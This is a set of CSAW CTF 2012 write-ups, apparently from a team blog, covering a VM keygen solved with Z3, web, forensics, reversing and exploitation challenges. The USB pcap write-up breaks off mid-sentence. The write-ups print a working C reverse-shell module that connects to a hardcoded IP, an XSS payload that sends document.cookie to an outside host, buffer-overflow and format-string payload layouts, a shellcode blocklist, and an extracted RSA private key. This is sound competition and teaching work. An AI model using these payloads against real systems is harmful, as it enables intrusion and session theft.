POP 00 POP 00 PUSH 04 PUSH 03 PUSH 02 PUSH8 ff POP 02 PUSH8 08 POP 04 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 01 PUSH 05 PUSH 05 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 04 POP 03 POP 01 PUSH 03 PUSH 05 PUSH 04 PUSH8 08 POP 04 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 
SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 04 POP 03 POP 02 POP 01 PUSH 05 PUSH 05 PUSH 03 PUSH 04 PUSH8 ff POP 02 PUSH8 08 POP 04 MOV 31 AND 32 ADD 30 LOAD8 53 MOV 31 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 AND 32 ADD 30 LOAD8 33 SLL 34 SLL 34 XOR 53 MOV 31 SRL 34 SRL 34 SRL 34 ADD 30 LOAD8 33 SLL 34 SLL 34 SLL 34 XOR 53 POP 01 POP 02 POP 03 MOV 45 PUSH8 08 POP 00 MOV 52 SLL 50 SRL 20 SRL 20 SRL 20 XOR 25 MOV 54 SRL 50 SLL 40 SLL 40 SLL 40 XOR 45 PUSH8 10 POP 00 MOV 53 SRL 50 SLL 30 XOR 35 MOV 01 XOR 12 XOR 23 XOR 34 XOR 40 EXIT
After a lot of boring reverse on this code, this gives us the following algorithm (the mapping table is the constant array mentioned earlier in the VM state):
static const unsigned char mapping[] = { 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x17, 0x44, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16 }; static unsigned int transpose(unsigned int n) { unsigned int new_n = 0; new_n |= mapping[(n >> 0) & 0xFF] << 0; new_n |= mapping[(n >> 8) & 0xFF] << 8; new_n |= mapping[(n >> 16) & 0xFF] << 16; new_n |= mapping[(n >> 24) & 0xFF] << 24; return new_n; } static unsigned int rotl(unsigned int n, unsigned int sa) { return (n << sa) | (n >> (32 - sa)); } static void round(unsigned int* a, unsigned int* b, unsigned int* c, 
unsigned int* d) { unsigned int at; *a = transpose(*a); *b = transpose(*b); *c = transpose(*c); *d = transpose(*d); at = *a; *b = rotl(*b, 8); *c = rotl(*c, 16); *d = rotl(*d, 24); *a ^= *b; *b ^= *c; *c ^= *d; *d ^= at; } int main(void) { unsigned int nh = 0x4b17e245; // name hash, constant unsigned int k1, k2, k3; scanf("%x-%x-%x", &k1, &k2, &k3); round(&nh, &k1, &k2, &k3); round(&nh, &k1, &k2, &k3); if (nh != 0x01020304 || k1 != 0x05060708 || k2 != 0x09101112 || k3 != 0x0d14151e) puts("FAIL :("); else puts("SUCCESS :)"); return 0; }
Now that we have the algorithm, we still need to generate a key that will result in valid values in the end. As I was lazy and it was getting late in the evening, I implemented the algorithm with Z3Py and asked it to solve the problem for me. Unfortunately I failed several times to implement the algorithm, and the iteration time was quite long because Z3 needed 20-30 minutes to get me a key matching my description of the problem, so we only got the answer in the morning.
# Z3 model of the two-round hash: find k1, k2, k3 such that the final state
# equals the constants checked by the binary. (Python 2 script.)
# Every 32-bit word is represented as a list of four 8-bit vectors, most
# significant byte first.
from z3 import *

s = Solver()

# The substitution table is an array constrained entry by entry.
# Each line of mapping.txt holds two hexadecimal tokens "a b", giving the
# constraint mapping[b] == a.
mapping = Array('mapping', BitVecSort(8), BitVecSort(8))
for l in open('mapping.txt'):
    l = l.strip()
    a, b = l.split()
    s.add(mapping[int(b, 16)] == int(a, 16))

# nh is the name hash; k1, k2, k3 are the three unknown parts of the key.
nh = list(BitVecs('nh1 nh2 nh3 nh4', 8))
k1 = list(BitVecs('k11 k12 k13 k14', 8))
k2 = list(BitVecs('k21 k22 k23 k24', 8))
k3 = list(BitVecs('k31 k32 k33 k34', 8))

# The name hash is fixed to 0x4b17e245.
s.add(nh[0] == 0x4b, nh[1] == 0x17, nh[2] == 0xe2, nh[3] == 0x45)

def transpose(n):
    # Substitute each byte of the word through the mapping table.
    return [mapping[n[0]], mapping[n[1]], mapping[n[2]], mapping[n[3]]]

# With MSB-first byte lists, rotating left by 8/16/24 bits is a rotation of
# the list by 1/2/3 positions.
def rotl8(n):
    return [n[1], n[2], n[3], n[0]]

def rotl16(n):
    return [n[2], n[3], n[0], n[1]]

def rotl24(n):
    return [n[3], n[0], n[1], n[2]]

def xor(a, b):
    # Byte-wise xor of two words.
    return [a[0] ^ b[0], a[1] ^ b[1], a[2] ^ b[2], a[3] ^ b[3]]

# NOTE: this shadows the builtin hash(). transp=False skips the substitution
# step; both calls below use the default.
def hash(a, b, c, d, transp=True):
    if transp:
        at = transpose(a)
        bt = transpose(b)
        ct = transpose(c)
        dt = transpose(d)
    else:
        at, bt, ct, dt = a, b, c, d
    r1 = xor(at, rotl8(bt))
    r2 = xor(rotl8(bt), rotl16(ct))
    r3 = xor(rotl16(ct), rotl24(dt))
    r4 = xor(rotl24(dt), at)
    return r1, r2, r3, r4

# Two rounds, the second one applied to the output of the first.
r1, r2, r3, r4 = hash(nh, k1, k2, k3)
r1, r2, r3, r4 = hash(r1, r2, r3, r4)

# Expected final state: 0x01020304, 0x05060708, 0x09101112, 0x0d14151e.
s.add(r1[0] == 0x01, r1[1] == 0x02, r1[2] == 0x03, r1[3] == 0x04)
s.add(r2[0] == 0x05, r2[1] == 0x06, r2[2] == 0x07, r2[3] == 0x08)
s.add(r3[0] == 0x09, r3[1] == 0x10, r3[2] == 0x11, r3[3] == 0x12)
s.add(r4[0] == 0x0d, r4[1] == 0x14, r4[2] == 0x15, r4[3] == 0x1e)

print s.check()
print s.model()
After running for 20 minutes, this gave me the following valid key:
e5304760-47b7c45f-f59a8f29
. Later, a friend tried to find a better way to solve this problem, and noticed that it was reducible to a 32-bit bruteforce. Using this method, we found the previous key, but also a second valid key:
b6b09bf0-f23daa06-ac4ee747
.CSAW CTF 2012: Web 500 writeup
Web 500 was a webpage with a small UI sending AJAX commands to a backend. These commands were either some UNIX commands (
uname -a
,uptime
, …) or something that looked like a heartbeat check for an external service.Our first idea was obviously to inject UNIX commands but the backend seemed to have a very restrictive whitelist, allowing only the commands that were exposed by the UI and nothing else (not even adding options to the commands worked).
The heartbeat check sent a JSON command which looked like this:
{ "message": "extenderp", "extenderpurl": "http://127.0.0.1:8080/test/extenderptest.node" }
It turns out we can download this
extenderptest.node
file from the web server using the same URL. It was a simple NodeJS C++ module exporting a singletest
function which returned a string. This led us to think the extenderp
message actually downloaded the NodeJS module from the URL and executed its test module. We checked if theextenderpurl
could point to the external world, and sure enough the web server tried to download a file from our server! The last step was then to write a NodeJS module which allowed us to get the key from the server. I chose to implement a fork/connect/dup2/execve exploit in the
test
function:#include <v8.h> #include <node.h> #include <unistd.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> using namespace node; using namespace v8; extern "C" { static Handle<Value> test(const Arguments& args) { if (!fork()) { int fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); struct sockaddr_in connaddr; memset(&connaddr, 0, sizeof (connaddr)); connaddr.sin_family = AF_INET; connaddr.sin_addr.s_addr = inet_addr("176.9.97.190"); connaddr.sin_port = htons(12345); connect(fd, (sockaddr*)&connaddr, sizeof (connaddr)); dup2(fd, 0); dup2(fd, 1); dup2(fd, 2); char* argv[] = { "/bin/sh", NULL }; execve("/bin/sh", argv, NULL); exit(0); } v8::HandleScope scope; return v8::String::New("Connectback should have happened"); } static void init(Handle<Object> target) { v8::Local<FunctionTemplate> local_function_template = v8::FunctionTemplate::New(test); target->Set(String::NewSymbol("test"), local_function_template->GetFunction()); } NODE_MODULE(expl, init); }
We uploaded that NodeJS module and used the
extenderp
command to get it to be run on the server, which worked very well! We were able to get shell access on the server and find the key for this challenge.CSAW CTF 2012: Web 400 writeup
Note: this article uses MathJax to display formulas written in TeX. Please enable Javascript in order to see the formulas correctly.
Web 400 was an interesting challenge involving web exploits as well as crypto. We had access to a web application which allowed sending messages from a user to another. The twist is that all of these messages were encrypted using an unknown algorithm. When sending a message the user provides a key which is used to encrypt the message.
After analyzing the algorithm a bit (same key and message, trying different key sizes and block sizes, checking if every block is encrypted the same, etc.) we found out that it was some kind of ECB XOR using the key + a constant 64 bits value. This was only true for the first few blocks though: after that another key or another constant value was used. As we’ll soon see, this does not matter a lot.
We were able to confirm that this message system is vulnerable to XSS attacks by sending some strings that give HTML tags when encrypted. We just need to encode a cookie stealer and send it to the admin user to gain access to his account.
Now that we know this algorithm uses XOR as its main operation, we can use a very interesting property of this binary operator:
$$Plain \oplus Key = Cipher \Leftrightarrow Plain \oplus Cipher = Key$$If we send a block using a plaintext
P1
and it gives usC1
, we can use that property to deduce what we should send to haveC2
be what we want: $$P2 = C2 \oplus Key \Rightarrow P2 = C2 \oplus (P1 \oplus C1)$$ It turns out we can’t use that for a whole message because the key seems to depend on the previous blocks’ plaintexts. We had to construct the message block by block using that technique. When encrypted, our message is:
<script>new Image().src="http://delroth.net/?c="+encodeURI(document.cookie);</script>
We sent that to the admin and got his session ID transmitted to our server. Using that we were able to log in to his account and find some encrypted messages (and their associated key). The first message had a plaintext key and, when decrypted, gave us another encryption key, which we used to decrypt a second message, giving us the final key we had to submit on the CTF website.
CSAW CTF 2012: timewave-zero.pcap (net400)
< mserrano> inb4 you have to rotate and flip the pcap and get a gzip out of it
For this exercise, we are provided a pcap file containing PMU reporting values using the Synchrophasor protocol, also known as IEEE C37.118. The first thing is to google that, and see what we get. The most interesting result is Wireshark wiki. Indeed we can find example files on this page. If you download the fourth example (“
C37.118_4in1PMU_TCP.pcap
”) and binary diff it with timewave-zero.pcap you see the only changing data are the timestamps of the Synchrophasor packets. We can therefore assume that we have to work on those values.There are 1353 timestamps, but if we look closer, we can see that all the timestamps are between 2012-12-21 00:00:00 GMT and 2012-12-22 23:59:59 GMT except for the last one which is 1970-01-01 00:00:00 GMT a.k.a 0. Ignoring it gives us 1352 timestamps, and 1352 just happens to be a multiple of 8 (1352 = 8 * 13 * 13). That looks good for hiding 1 bit of data in each timestamp.
So now, 1 bit per timestamp. You start the guessing game with the classic LSB. No dice… LSB after reordering the packets according to their timestamps? No dice… 0 bits and 1 bits encoded according to the packet being late or early in a virtual packet reordering (hey, who knows…). Guess what? No dice.
Hell we even tried animating the synchrophaser before and after packet reordering to see if something would “draw” during the animation. No dice… Time to stop the guessing game and use a weapon of mass statistical destruction: the histogram! Let’s see if we find some statistical data bias.
We can notice two things:
- More values on the left, which represents smaller timestamps
- A gap in the middle of the histogram
With these observations we can infer how the information is hidden in the timestamps: assuming the output should be readable ASCII characters, we can assume the probability of a 0 bit to be higher than that of a 1 bit. Looking again at the histogram, thresholding at the midpoint of the timestamp range would give us exactly that. Furthermore, the gap in the middle is quite convenient insofar as it probably prevents ambiguities at the threshold value (should we threshold using > or >= ?)
With all this we can write a script which takes all the timestamps and get the key:
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""Recover the bytes hidden in the Synchrophasor packet timestamps.

Usage: script TIMESTAMPS_FILE OUTPUT_FILE

TIMESTAMPS_FILE holds one integer timestamp per line, in packet order.
"""

import sys
import struct


def decode_timestamps(timestamps):
    """Return the bytes encoded by `timestamps`, one bit per timestamp.

    A timestamp at or above the midpoint of the [min, max] range encodes a
    1 bit, a timestamp below it a 0 bit. Bits are packed MSB first; trailing
    bits that do not fill a whole byte are dropped. An empty input gives an
    empty result.
    """
    if not timestamps:
        return b""

    min_ts = min(timestamps)
    max_ts = max(timestamps)

    chunks = []
    val = 0
    bitcnt = 0
    for ts in timestamps:
        val <<= 1
        # Closer to the maximum than to the minimum (ties count as 1).
        if (ts - min_ts) >= (max_ts - ts):
            val |= 1
        bitcnt += 1
        if bitcnt == 8:
            chunks.append(struct.pack("B", val))
            bitcnt = 0
            val = 0
    return b"".join(chunks)


def main(argv):
    """Decode the timestamps listed in argv[1] and write the bytes to argv[2]."""
    with open(argv[1]) as f:
        # Blank lines (e.g. a trailing newline) carry no timestamp.
        timestamps = [int(line) for line in f if line.strip()]
    if not timestamps:
        sys.exit("no timestamps found in %s" % argv[1])

    print("len = %d, min = 0x%x, max = 0x%x" % (len(timestamps),
                                                 min(timestamps),
                                                 max(timestamps)))

    # Binary mode: the decoded payload is raw bytes, not text.
    with open(argv[2], "wb") as out:
        out.write(decode_timestamps(timestamps))


if __name__ == "__main__":
    main(sys.argv)
Let’s run it:
key{411a8451f24b40647d518ccc456a9e6502f59a8992118d8bf08a65eb16feddba33561d0b383af978402631fba670b366f118505ee3c9ac3e37c9ad33b0d5db469585dd2cf5192fba9e1a99c5d336c3459089}
BUT as if steganography is not already annoyingly game-guessing enough, just submitting the key and call it a day would have been too easy, wouldn’t it? ;) We were unable to validate the key, which was refused by the web interface.
Clever ending: What if an undergraduate intern used VARCHAR(128) to store the key in the database validating the challenge? So we only pasted the first 128 chars.
Real ending: There was something else which was different from the Wireshark wiki reference file. One byte in the
snaplen
field of the global pcap header was changed from 0xFF to 0x7F. So we thought we had to take only the0x7F
first characters (nonsense, right?). As you are well aware,0x7F
equals 127. It sometimes helps to mistakenly copy 128 chars instead of 127 when copy/pasting!That’s all folks! Is timewave-zero.pcap the new BMP? Maybe not, but close enough we’d say. What do you think?
CSAW CTF 2012: Reverse Engineering 500 writeup
This reverse engineering challenge presented us with two binary files:
8086100f.mrom
and8086100f.mrom.tmp
. Looking through the strings we quickly noticed the MROM file is a PXE ROM for an Intel e1000e network card, based on iPXE (an open source PXE ROM with a lot of useful features). Very nice coincidence for us: a member of our team (Marin Hannache) was a GSoC student working on iPXE during this last summer, which helped us a lot in understanding what this challenge was about.iPXE allows the user to embed a script that is automatically run at boot time, in order to download file, send a query to a web server, get an IP from a DHCP server, or a lot of other possible actions. Looking a bit more in the strings of the MROM file we saw something that is likely to be a boot script for iPXE:
#!ipxe :retry dhcp || goto retry prompt --key 0x03 --timeout 5000 (Quick, Quick!) Press CTRL+C for GDB UDP stub && gdbstub udp net0 || kernel https://secure-doomsday-client-loader.c0.cx/boot/vmlinuz initrd https://secure-doomsday-client-loader.c0.cx/boot/initrd.gz?include_flag=0 boot
If the user does not press Ctrl+C to interrupt the boot sequence, iPXE will download a kernel and an initrd from an HTTPS server and boot using these files. The initrd seems very interesting with its
include_flag
query argument, so we tried to download it locally, settinginclude_flag=1
:$ wget --no-check-certificate "https://secure-doomsday-client-loader.c0.cx/boot/initrd.gz?include_flag=1" --2012-09-30 16:43:56-- https://secure-doomsday-client-loader.c0.cx/boot/initrd.gz?include_flag=1 Resolving secure-doomsday-client-loader.c0.cx... 128.238.66.211 Connecting to secure-doomsday-client-loader.c0.cx|128.238.66.211|:443... connected. WARNING: cannot verify secure-doomsday-client-loader.c0.cx's certificate, issued by ‘/C=YO/ST=LO/L=None/O=None/OU=None’: Self-signed certificate encountered. HTTP request sent, awaiting response... 400 Bad Request 2012-09-30 16:43:57 ERROR 400: Bad Request.
At first we thought the challenge was down, so we waited a bit, but the request was always failing. We then realized that some of the other strings in that file mentioned an
OpenSSL Generated Certificate
. The server was probably waiting for a query performed with a valid SSL client certificate/key pair, which was most likely embedded in the iPXE rom. After generating certificates and keys with OpenSSL and trying to match what was in the ROM with the DER format certificates we generated, we were able to extract a certificate and an RSA key from it:$ openssl x509 -in chall.crt -inform DER -----BEGIN CERTIFICATE----- MIIDhzCCAm+gAwIBAgICEAAwDQYJKoZIhvcNAQEFBQAwRzELMAkGA1UEBhMCWU8x CzAJBgNVBAgMAkxPMQ0wCwYDVQQHDAROb25lMQ0wCwYDVQQKDAROb25lMQ0wCwYD VQQLDAROb25lMB4XDTEyMDkwNTIyMzU1OVoXDTEyMTIwNDIyMzU1OVowSTELMAkG A1UEBhMCWU8xCzAJBgNVBAgMAkxPMQ0wCwYDVQQKDAROb25lMQ0wCwYDVQQLDARO b25lMQ8wDQYDVQQDDAZjbGllbnQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK AoIBAQDTp0cg6VHOUL0VIzcGic14TrZ0SsIvuwhkGX1d/qmmg+LL5nP0O0gRK+TF o42go5bCpCicnX3t13U5Pt8bCVyQTYaGaWiYf2v3z4/D3jd0ar6ENW2lwD5u9o/S cNfap24f2SJfDY70JR7bnd6CRimDIAj2Kjw2lEklQj2aGknX/cv3R1jL1C1PFehD 0zdi1TcXZU21acAVGkQpaSHKg4ufRk0xEE41RsieOusICHJcS4uM4bnZ2ThJhmR0 wj7/ld3iEOn5hD6dN9GY4vkqspIObOTgF50qhNVthN9HRzZUuyRxVCo95n+QvsjM BpfK8SXQiWCVL8XHLxdRn8Fc8o0XAgMBAAGjezB5MAkGA1UdEwQCMAAwLAYJYIZI AYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQW BBQ8byvWA23f0DM/awb8AXB5sTqD9jAfBgNVHSMEGDAWgBSLfrxvYsZ1DUoH78PW dswZHqu6czANBgkqhkiG9w0BAQUFAAOCAQEAN3/0hNnCFZ7IgbiZjjzEPv/qBU5B teP7cm9M1Zr3MAF6L0+f6FDEjYCrKLEyiz4KKe9p0aUXiwvFiv8olQFhrybVDXjD dCgex8wC3aIzGurnpKCrINUM3ZYY9ukd2JX1dZGsbK/dKiPQZRsBpnWnMI2ZBx9W 1z2TUtAGAEpB5hDdud9mlQBdgSMh7mxCnTQtIUkKZp7JEeyuRwoifdWCGldyn0kW Yn3JMaY0iWE/T50+vqTxrhbB26u4IGzMW7FhHG8BDRpbnycpnQWLPDi1RyLVruyj Q6/xX6JfJZBcPpQ1N885BguEwS9XVW0jcvTHNSaYK31u6XA6BRTvm+yNMA== -----END CERTIFICATE----- $ openssl rsa -in chall.key -inform DER writing RSA key -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEA06dHIOlRzlC9FSM3BonNeE62dErCL7sIZBl9Xf6ppoPiy+Zz 9DtIESvkxaONoKOWwqQonJ197dd1OT7fGwlckE2GhmlomH9r98+Pw943dGq+hDVt pcA+bvaP0nDX2qduH9kiXw2O9CUe253egkYpgyAI9io8NpRJJUI9mhpJ1/3L90dY 
y9QtTxXoQ9M3YtU3F2VNtWnAFRpEKWkhyoOLn0ZNMRBONUbInjrrCAhyXEuLjOG5 2dk4SYZkdMI+/5Xd4hDp+YQ+nTfRmOL5KrKSDmzk4BedKoTVbYTfR0c2VLskcVQq PeZ/kL7IzAaXyvEl0IlglS/Fxy8XUZ/BXPKNFwIDAQABAoIBAFMQOyH3b1uA5DP/ dgDi4/hrK7/H9x20UT63ojPZVcs7xy4uayNWgJn8l/PYlCSPDwOkWSvdwyYsgJzO x9BchC89vaXSiHIQz9aZZtp/w1O08MACF94M7HOv4BG+p3fwbY+iL5MORyQZzVpz QnfuASyszdeOC8N/vpUYwgRQfNp+0TTJoGyJOwkVYn6EqSBmIh99UVaKTAPNXpCS RpcACnWQC9LR8asagd3orLQ5KoKjidy7oY5CJxq2hif9X2satxkftqsNxmtlOG6D 4xM7sYgXYH1DQibpNiCRZrAqJ1sDx6DEnOmrQf0U2UBpTKlSNCZYqzX7h9th0AFO dZwFwwECgYEA9NeE1pwBkvXToG76woCzm0nkTX4XzqVjwLFV1c+B/pYg0cwaCcrn PzQCm9IUAt1wvfKRiBiYZZF3FOhkzeQH7QqAsWLalNal0w9xaklI2LzezwbmWNEJ zNjnl2JCnI03xUjk/irWl0B07NqfHbPA8MzLtaEdld15k+87ZzsTTvECgYEA3UyP vAOdBLT8GAQ7W0XU0sTUhWSr0Pezn5kIURBcEm8z9dTwfUxkWDOSGjXRGAcJLkRX YLdDUVtReM9LxUSzQ4k488NyySMPcqzVohROhhS2DVyecOs+Yy2VAc62z2V2IJsN +JKzvjANHttSfA4fRZJN75rmz+TVztbmtjxarIcCgYBEkb8gI1zFfZchDTOpGUYz rUQE99VPCD6hjoiNcqnjVMQoPVLlfy+4IabBYNo92yph5/cd+FVlzJFfB56DkuMt XY2hICA7IsoaC+8lZxTBrlNwA2yrXw+xkOV7HgettFb0J3AKRpEGlwSn+KorNVZJ mfFLEq4odHhCF/O4+3By4QKBgQDRmUop0WJOqvx54sg1UpaYakS/cvIpIfLHHrJ5 1PzfmOOl2uFMS6Zew7mFiaNZFpDjeWco+2qPC+bGfdBOLxt6w+VlO6DkUIi5HGna 8VDOPZ+QWEDYwnZ8iRewdpE/LeIMT8+Tt572a5yBtUkSpm2H/2JBpn0mOp8nIPOz dsaK0QKBgEnVXm4ASylC9GAq7hcuppeXF+IwoxdI1iCDzK9U+n3nAKn/kcIyWE7N i9kXk8O1jRqEARpXaMp/ydWXuwfsjBv6e/R9IR+elkazbbr/dIcpofHunYRtrPwx yasGBlKiMmE6UrRUu/xY+jxG8BQfNNP1gU4ggUhvhtTGoRloRF1E -----END RSA PRIVATE KEY-----
Using these two files we were able to download the initrd successfully and extract it to find the key in
/key.txt
.CSAW CTF 2012: for200-500/net100-200/re100-400/web100-300/web600 writeups
This article regroups writeups for several challenges which did not deserve a full article.
for200 (1)
When you decode the chunks of the PNG file individually only one has a CRC error. It contains text which is the key to submit.
for200 (2)
When you decode the chunks of the PNG file individually only one text chunk has no CRC error. It contains text which is the key to submit.
for500
strings
net100
Open with Wireshark, “Follow TCP Stream” and notice a password being sent to a telnet server. This is the key.
net200
Find the POST request to a
<form>
on the New York bar website. The text sent with that form contains the key.re100
Open the executable with IDA, notice a function that does
c XOR 0xFF
on every byte of a string, locate the string, apply the xor, get the key.re200
Open the executable with Reflector, notice a function that does a XOR once again, reverse the operation, get the key.
re300
A bit more complicated this time: the decryption function needs a key, and the only thing we know is that the MD5 of the key is
ff97a9fdede09eaf6e1c8ec9f6a61dd5
. A Google Search tells us that this isMD5(Intel)
. This is still not the final key: the program uses that to decrypt a buffer using AES. Doing the same gives us the key to submit.re400
Open the binary with IDA, notice a
decrypt
function that doesNOT c
, locate the string, apply the NOT, get the key.web100
The auth is done through a cookie. Modify it (set username to admin), done.
web200
The SQL query allows us to inject something mysqli_real_escape’d in a LIKE clause, including
%
and_
. We can use that to select multiple users and have one matching the$auth
condition (valid password, we register him) and one matching the$admin
condition (username == Administrator).web300
There is an SQL injection on the
horses.php
page. You can’t normally use theselect
orunion
keywords (blacklisted), but if there is an equal sign before the keyword in the request it somehow works. From there we listed the tables inINFORMATION_SCHEMA
, found asessions
table containing a session for the admin user, used it to get the key. This was not the way the author expected people to solve his exercise and this bug was fixed during CTF.web600
In PHP strcmp/strcasecmp with an array fails and returns 0. We can use that to bypass the check and get the key to be printed.
CSAW CTF 2012: exploitation 200/300/400/500 writeups
This article regroups writeups for all exploitation challenges which did not deserve a full article.
Exploitation 200
This challenge is a Linux ELF32 binary which listens on port 54321.
Each time a new client connects, it sends a welcome message and waits to receive 512 bytes of data. This data is compared to the string “A” * 26 + “\n”; if it matches, the challenge opens the file “key” and sends it to us.
The key is : “b3ee1f0fff06f0945d7bb018a8e85127”
Exploitation 300
This challenge is a Linux ELF32 binary which listens on port 4842. The binary sets up handlers for different signals, the most interesting one being SIGSYS (0x1F): after a client connects and the binary sends it a welcome message, it raises this signal. The handler then sends another message and reads 2048 bytes of data into a 326-byte buffer on the stack. It’s clearly a simple stack-based buffer overflow. And a fun thing is:
> readelf -l ./bin | grep STACK GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
The stack is executable, so let’s search some fun gadgets like jmp esp :
> rasm2 "jmp esp" ffe4
This gadget can be found inside section .eh_frame_hdr (0x08048F47). So the payload is really simple and looks like this:
"A" * 326 + Addr_return (JMP ESP) + Shellcode (dup2 + execve(/bin/sh))
They changed the binary before we wrote this writeup, so our exploit does not work anymore and we don’t remember the key.
Exploitation 400
This challenge is a Linux ELF32 binary which listens on port 23456.
The vulnerability is inside the function sdoomsday() (the binary still has its symbols…): it receives 511 bytes into the .bss section and passes this buffer directly as the format string of a sprintf call that fills a buffer on the stack. It’s a simple format string vulnerability.
A nice thing is that .bss section is executable, so the payload will be :
| JMP AFTER FORMAT | FORMAT | NOP | SHELLCODE
What we have to do is overwrite the GOT entry of a function called just after sprintf (for example send, which is called inside the cd() function). Another fun trick is inside the ssc function: it checks whether the buffer contains any of the following patterns:
/bin/sh /usr/bin/es /usr/bin/ksh /bin/ksh /usr/bin/rc /usr/bin/esh /bin/dash /bin/bash /bin/rbash h//shh/bin
Just XOR your shellcode and prepend a stub that un-XORs it at runtime.
The key is : “What_a_simple_filter_that_was”
Exploitation 500
This is the last exploitation challenge; as usual, it is a Linux ELF32 binary which listens on port 12345.
The first thing the program does is receive 124 bytes and check whether this buffer contains the following pattern:
CPE1704TKS IMSAI 8080 microcomputer WORP Galaga Pencil Tic-Tac-Toe
It then receives up to 1024 bytes, but the return value of recv() is used as the size of a memcpy() into a buffer that is too small, so it is a simple stack-based buffer overflow. We can easily overwrite the return address with the address of recv() and forge the stack like this:
+0xBC : New Return Address : 0x08048760 # .plt recv() +0xC0 : Return Address recv : 0x0804B000 # .bss section +0xC4 : File Descriptor : 0x4 # socket client +0xC8 : Buffer : 0x0804B000 # .bss section +0xCC : Size : 0x54 # Size Shellcode +0xD0 Flags : 0x0 # who care ?
We send the same shellcode as usual dup2 + execve(/bin/sh), and enjoy our shell.
The key is “Something_different_from_strcpy”
CSAW CTF 2012: dongle.pcap (net300)
We received a pcap file containing USB Request Blocks (URBs) with no other information. A quick look at the exchanged frames with Wireshark revealed that most of the data was sent to the host from a specific device (26.3, HID device from “bInterfaceClass”, keyboard from “bInterfaceProtocol” from the official documentation) on an interrupt endpoint.
The first idea was of course: is the key typed on the keyboard? Every interrupt packet from the 26.3 device was carrying a keycode, and all these packets had the same URB id:
0xffff88003b7d8fc0
. Exploring packets structure made it easy to localize these keycodes: the offset0x42
of these interrupt packets. We then just had to script the extraction of keycodes using a correspondence table! We created a Python script using the
dpkt
